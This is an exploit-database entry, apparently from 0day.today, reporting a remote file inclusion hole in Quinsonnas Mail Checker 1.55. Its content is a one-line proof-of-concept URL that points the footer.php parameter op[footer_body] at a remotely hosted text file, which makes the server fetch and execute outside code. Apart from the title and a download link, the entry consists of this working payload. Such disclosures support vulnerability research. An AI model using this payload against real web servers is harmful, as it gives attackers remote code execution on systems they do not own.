id: 2686
date: 02/23/2008
title: Quinsonnas Mail Checker 1.55 (footer.php) RFI Vulnerability
author: GoLd_M
cves: 

===========================================================
Quinsonnas Mail Checker 1.55 (footer.php) RFI Vulnerability
===========================================================



### Quinsonnas Mail Checker 1.55 (footer.php) Remote File Inclusion Vulnerabilities
### http://switch.dl.sourceforge.net/sourceforge/quinsonnas/quinsonnas-1.55.tar.bz2
### POC :
###     /quinsonnas-1.55/footer.php?op[footer_body]=http://localhost/020.txt?





#  0day.today [2023-03-22]  #